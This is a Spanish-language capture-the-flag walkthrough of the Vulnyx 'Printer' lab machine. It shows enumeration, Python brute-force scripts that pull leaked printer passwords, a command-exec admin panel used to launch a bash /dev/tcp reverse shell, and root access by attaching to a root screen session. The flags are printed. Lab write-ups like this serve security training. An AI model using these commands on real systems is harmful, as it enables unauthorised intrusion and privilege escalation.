Printer Vulnyx (Easy - Linux)
Escaneo de puertos
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn <IP>nmap -sCV -p<PORTS> <IP>Info:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-21 03:26 EDT
Nmap scan report for 192.168.5.86
Host is up (0.0039s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp open http Apache httpd 2.4.56 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.56 (Debian)
9999/tcp open abyss?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq,
LDAPSearchReq, LPDString, NCP, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe:
| Konica Minolta Printer Admin Panel
| Password:
| NULL:
|_ Konica Minolta Printer Admin Panel
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at
https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9999-TCP:V=7.95%I=7%D=8/21%Time=68A6CA19%P=x86_64-pc-linux-gnu%r(NU
SF:LL,25,"\nKonica\x20Minolta\x20Printer\x20Admin\x20Panel\n\n")%r(GetRequ
SF:est,2F,"\nKonica\x20Minolta\x20Printer\x20Admin\x20Panel\n\nPassword:\x
SF:20")%r(HTTPOptions,2F,"\nKonica\x20Minolta\x20Printer\x20Admin\x20Panel
SF:\n\nPassword:\x20")%r(FourOhFourRequest,2F,"\nKonica\x20Minolta\x20Prin
SF:ter\x20Admin\x20Panel\n\nPassword:\x20")%r(JavaRMI,2F,"\nKonica\x20Mino
SF:lta\x20Printer\x20Admin\x20Panel\n\nPassword:\x20")%r(GenericLines,2F,"
SF:\nKonica\x20Minolta\x20Printer\x20Admin\x20Panel\n\nPassword:\x20")%r(R
SF:TSPRequest,2F,"\nKonica\x20Minolta\x20Printer\x20Admin\x20Panel\n\nPass
SF:word:\x20")%r(RPCCheck,2F,"\nKonica\x20Minolta\x20Printer\x20Admin\x20P
SF:anel\n\nPassword:\x20")%r(DNSVersionBindReqTCP,2F,"\nKonica\x20Minolta\
SF:x20Printer\x20Admin\x20Panel\n\nPassword:\x20")%r(DNSStatusRequestTCP,2
SF:F,"\nKonica\x20Minolta\x20Printer\x20Admin\x20Panel\n\nPassword:\x20")%
SF:r(Help,2F,"\nKonica\x20Minolta\x20Printer\x20Admin\x20Panel\n\nPassword
SF::\x20")%r(SSLSessionReq,2F,"\nKonica\x20Minolta\x20Printer\x20Admin\x20
SF:Panel\n\nPassword:\x20")%r(TerminalServerCookie,2F,"\nKonica\x20Minolta
SF:\x20Printer\x20Admin\x20Panel\n\nPassword:\x20")%r(TLSSessionReq,2F,"\n
SF:Konica\x20Minolta\x20Printer\x20Admin\x20Panel\n\nPassword:\x20")%r(Ker
SF:beros,2F,"\nKonica\x20Minolta\x20Printer\x20Admin\x20Panel\n\nPassword:
SF:\x20")%r(SMBProgNeg,2F,"\nKonica\x20Minolta\x20Printer\x20Admin\x20Pane
SF:l\n\nPassword:\x20")%r(X11Probe,2F,"\nKonica\x20Minolta\x20Printer\x20A
SF:dmin\x20Panel\n\nPassword:\x20")%r(LPDString,2F,"\nKonica\x20Minolta\x2
SF:0Printer\x20Admin\x20Panel\n\nPassword:\x20")%r(LDAPSearchReq,2F,"\nKon
SF:ica\x20Minolta\x20Printer\x20Admin\x20Panel\n\nPassword:\x20")%r(LDAPBi
SF:ndReq,2F,"\nKonica\x20Minolta\x20Printer\x20Admin\x20Panel\n\nPassword:
SF:\x20")%r(SIPOptions,2F,"\nKonica\x20Minolta\x20Printer\x20Admin\x20Pane
SF:l\n\nPassword:\x20")%r(LANDesk-RC,2F,"\nKonica\x20Minolta\x20Printer\x2
SF:0Admin\x20Panel\n\nPassword:\x20")%r(TerminalServer,2F,"\nKonica\x20Min
SF:olta\x20Printer\x20Admin\x20Panel\n\nPassword:\x20")%r(NCP,2F,"\nKonica
SF:\x20Minolta\x20Printer\x20Admin\x20Panel\n\nPassword:\x20");
MAC Address: 08:00:27:E0:64:DE (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 159.70 secondsVeremos varios puertos interesantes, entre ellos un puerto 80 que suele alojar una pagina web y un puerto 9999 que por lo que vemos en el reporte parece ser una impresora en la que puedes iniciar sesion mediante unas credenciales, si entramos en el puerto 80 veremos una pagina normal y corriente de apache2, por lo que vamos a realizar un poco de fuzzing a ver que vemos.
Gobuster
gobuster dir -u http://<IP>/ -w <WORDLIST> -x html,php,txt -t 50 -k -rInfo:
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.5.86/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php,txt
[+] Follow Redirect: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 277]
/index.html (Status: 200) [Size: 10701]
/.php (Status: 403) [Size: 277]
/api (Status: 403) [Size: 277]
Progress: 121947 / 882244 (13.82%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 122101 / 882244 (13.84%)
===============================================================
Finished
===============================================================Veremos que hay un recurso compartido llamado /api que es bastante interesante, por lo que vamos a ver que contiene dentro.
gobuster dir -u http://<IP>/api/ -w <WORDLIST> -x html,php,txt -t 50 -k -rInfo:
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.5.86/api/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php,txt
[+] Follow Redirect: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 277]
/.html (Status: 403) [Size: 277]
/printers (Status: 200) [Size: 303]
/.php (Status: 403) [Size: 277]
/.html (Status: 403) [Size: 277]
Progress: 397224 / 882244 (45.02%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 397506 / 882244 (45.06%)
===============================================================
Finished
===============================================================Veremos que nos ha descubierto un recurso llamado /printers, si entramos dentro de /printers veremos lo siguiente en la pagina:
Search for your printer with the following format: printer<id>.<ext>Veremos que esta utilizando una estructura de id y extension, por lo que podremos realizar un poco de fuerza bruta con varias extensiones y numeros, para saber cuales estan activos.
Vamos a crearnos un script para generar 2 archivos, uno que sea ids.txt y exts.txt con todo lo necesario.
generateTexts.py
# script.py
def generar_ids(nombre_archivo="ids.txt", limite=5000):
"""Genera un archivo con números del 0 hasta 'limite'."""
with open(nombre_archivo, "w") as f:
for i in range(limite + 1):
f.write(f"{i}\n")
print(f"Archivo '{nombre_archivo}' generado con {limite + 1} números.")
def generar_exts(nombre_archivo="exts.txt"):
"""Genera un archivo con algunas extensiones de ejemplo (sin punto)."""
extensiones = [
"json",
"js",
"txt",
"php",
"html",
"css",
"xml",
"csv",
"py",
"java"
]
with open(nombre_archivo, "w") as f:
for ext in extensiones:
f.write(f"{ext}\n")
print(f"Archivo '{nombre_archivo}' generado con {len(extensiones)} extensiones.")
if __name__ == "__main__":
generar_ids()
generar_exts()Los ejecutaremos de la siguiente forma:
python3 generateTexts.pyInfo:
Archivo 'ids.txt' generado con 5001 números.
Archivo 'exts.txt' generado con 10 extensiones.Ahora vamos a crear otro script en el que pruebe con dichos diccionarios la API de la impresora a ver que vemos.
printer.py
# brute_ctf.py
import requests
URL_BASE = "http://<IP>/api/printers/" # endpoint del CTF
TIMEOUT = 5 # segundos de timeout
def cargar_lista(nombre_archivo):
"""Lee un archivo de texto y devuelve una lista de líneas sin saltos."""
with open(nombre_archivo, "r") as f:
return [line.strip() for line in f if line.strip()]
def fuerza_bruta(ids_file="ids.txt", exts_file="exts.txt", output_file="resultados.txt"):
ids = cargar_lista(ids_file)
exts = cargar_lista(exts_file)
with open(output_file, "w") as salida:
for id_val in ids:
for ext in exts:
printer_name = f"printer{id_val}.{ext}"
url = URL_BASE + printer_name
try:
r = requests.get(url, timeout=TIMEOUT)
if r.status_code == 200:
print(f"[+] Posible válido: {printer_name} --> {url}")
salida.write(f"{printer_name} --> {url}\n")
except requests.RequestException:
# Ignora errores de conexión o timeouts
pass
print(f"\n[✓] Fuerza bruta finalizada. Resultados guardados en '{output_file}'")
if __name__ == "__main__":
fuerza_bruta()Ahora lo ejecutaremos de esta forma:
python3 printer.py Info:
[+] Posible válido: printer1.json --> http://192.168.5.86/api/printers/printer1.json
[+] Posible válido: printer2.json --> http://192.168.5.86/api/printers/printer2.json
[+] Posible válido: printer3.json --> http://192.168.5.86/api/printers/printer3.json
[+] Posible válido: printer4.json --> http://192.168.5.86/api/printers/printer4.json
[+] Posible válido: printer5.json --> http://192.168.5.86/api/printers/printer5.json
[+] Posible válido: printer1599.json --> http://192.168.5.86/api/printers/printer1599.jsonVeremos que nos ha encontrado estas impresoras, por lo que vamos a investigar que contiene cada una de ellas.
viewJSON.py
# view_jsons.py
import requests
import json
URLS = [
"http://<IP>/api/printers/printer1.json",
"http://<IP>/api/printers/printer2.json",
"http://<IP>/api/printers/printer3.json",
"http://<IP>/api/printers/printer4.json",
"http://<IP>/api/printers/printer5.json",
"http://<IP>/api/printers/printer1599.json",
]
TIMEOUT = 5
def mostrar_json(url):
try:
r = requests.get(url, timeout=TIMEOUT)
r.raise_for_status()
data = r.json() # convierte en dict
print(f"\n===== {url} =====")
print(json.dumps(data, indent=4, ensure_ascii=False)) # formatea bonito
except Exception as e:
print(f"[!] Error con {url}: {e}")
if __name__ == "__main__":
for url in URLS:
mostrar_json(url)Lo ejecutaremos de esta forma:
python3 viewJSON.pyInfo:
===== http://192.168.5.86/api/printers/printer1.json =====
{
"printer": {
"printer_id": "1",
"printer_password": "P4ssw0rd!"
}
}
===== http://192.168.5.86/api/printers/printer2.json =====
{
"printer": {
"printer_id": "2",
"printer_password": "iloveme"
}
}
===== http://192.168.5.86/api/printers/printer3.json =====
{
"printer": {
"printer_id": "3",
"printer_password": "qwerty"
}
}
===== http://192.168.5.86/api/printers/printer4.json =====
{
"printer": {
"printer_id": "4",
"printer_password": "admin"
}
}
===== http://192.168.5.86/api/printers/printer5.json =====
{
"printer": {
"printer_id": "5",
"printer_password": "root"
}
}
===== http://192.168.5.86/api/printers/printer1599.json =====
{
"printer": {
"printer_id": "1599",
"printer_password": "$3cUr3Pr1nT3RP4ZZw0rD"
}
}Veremos que es una serie de contraseñas, por lo que podremos probarlas en el puerto 9999 que hemos visto antes a ver cual funciona de todas.
Escalate user printer
Printer (9999)
nc <IP> 9999Info:
Konica Minolta Printer Admin Panel
Password: $3cUr3Pr1nT3RP4ZZw0rD
Please type "?" for HELP
>Si vemos el help poniendo ? veremos lo siguiente:
To Change/Configure Parameters Enter:
Parameter-name: value <Carriage Return>
Parameter-name Type of value
ip: IP-address in dotted notation
subnet-mask: address in dotted notation (enter 0 for default)
default-gw: address in dotted notation (enter 0 for default)
syslog-svr: address in dotted notation (enter 0 for default)
idle-timeout: seconds in integers
set-cmnty-name: alpha-numeric string (32 chars max)
host-name: alpha-numeric string (upper case only, 32 chars max)
dhcp-config: 0 to disable, 1 to enable
allow: <ip> [mask] (0 to clear, list to display, 10 max)
addrawport: <TCP port num> (<TCP port num> 3000-9000)
deleterawport: <TCP port num>
listrawport: (No parameter required)
exec: execute system commands (exec id)
exit: quit from telnet sessionVemos que con exec podemos ejecutar comandos a nivel de sistema, por lo que vamos a probar a ejecutar lo siguiente:
exec idInfo:
uid=1000(printer) gid=1000(printer) grupos=1000(printer)Veremos que esta funcionando, por lo que vamos a realizar un reverse shell de esta forma:
exec bash -c 'bash -i >& /dev/tcp/<IP>/<PORT> 0>&1'Ahora antes de enviarlo nos pondremos a la escucha:
nc -lvnp <PORT>Ahora si enviamos lo de antes y volvemos a donde tenemos la escucha veremos lo siguiente:
listening on [any] 7777 ...
connect to [192.168.5.50] from (UNKNOWN) [192.168.5.86] 55832
bash: no se puede establecer el grupo de proceso de terminal (311): Función ioctl no apropiada para el dispositivo
bash: no hay control de trabajos en este shell
printer@printer:/var/spool/lpd$ whoami
whoami
printerVeremos que ha funcionado, por lo que tendremos que sanitizar la shell.
Sanitización de shell (TTY)
script /dev/null -c bash# <Ctrl> + <z>
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=/bin/bash
# Para ver las dimensiones de nuestra consola en el Host
stty size
# Para redimensionar la consola ajustando los parametros adecuados
stty rows <ROWS> columns <COLUMNS>Ahora vamos a leer la flag del usuario:
user.txt
7cc698fe83419af87e0a504eb91913e2Escalate Privileges
Si listamos los permisos con SUID que tenemos a nivel de sistema, veremos lo siguiente:
find / -type f -perm -4000 -ls 2>/dev/nullInfo:
263828 56 -rwsr-xr-x 1 root root 55528 ene 20 2022 /usr/bin/mount
263458 72 -rwsr-xr-x 1 root root 71912 ene 20 2022 /usr/bin/su
259697 60 -rwsr-xr-x 1 root root 58416 feb 7 2020 /usr/bin/chfn
259700 88 -rwsr-xr-x 1 root root 88304 feb 7 2020 /usr/bin/gpasswd
259698 52 -rwsr-xr-x 1 root root 52880 feb 7 2020 /usr/bin/chsh
263830 36 -rwsr-xr-x 1 root root 35040 ene 20 2022 /usr/bin/umount
259701 64 -rwsr-xr-x 1 root root 63960 feb 7 2020 /usr/bin/passwd
263292 44 -rwsr-xr-x 1 root root 44632 feb 7 2020 /usr/bin/newgrp
280410 472 -rwsr-xr-x 1 root root 482312 feb 27 2021 /usr/bin/screen
273849 472 -rwsr-xr-x 1 root root 481608 jul 2 2022 /usr/lib/openssh/ssh-keysign
264755 52 -rwsr-xr-- 1 root messagebus 51336 oct 5 2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helperVeremos un binario interesante en esta linea:
280410 472 -rwsr-xr-x 1 root root 482312 feb 27 2021 /usr/bin/screenSi leemos la documentacion del binario veremos que se utiliza para crear sesion dentro del sistema por asi decirlo, si listamos los procesos que hay en ejecuccion en el sistema veremos lo siguiente:
ps -aux | grep "screen"Info:
root 318 0.0 0.0 2484 564 ? Ss 09:25 0:01 /bin/sh -c while true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root \;; done
printer 104776 0.0 0.0 3112 700 pts/1 R+ 10:27 0:00 grep screenVemos que esta ejecutando una sesion como root con screen por lo que podremos realizar lo siguiente:
screen -x root/Info:
root@printer:~# whoami
rootVeremos que con estos ya seremos root, por lo que leeremos la flag de root.
root.txt
616e894462fed90fec26f828a0a6c50eLast updated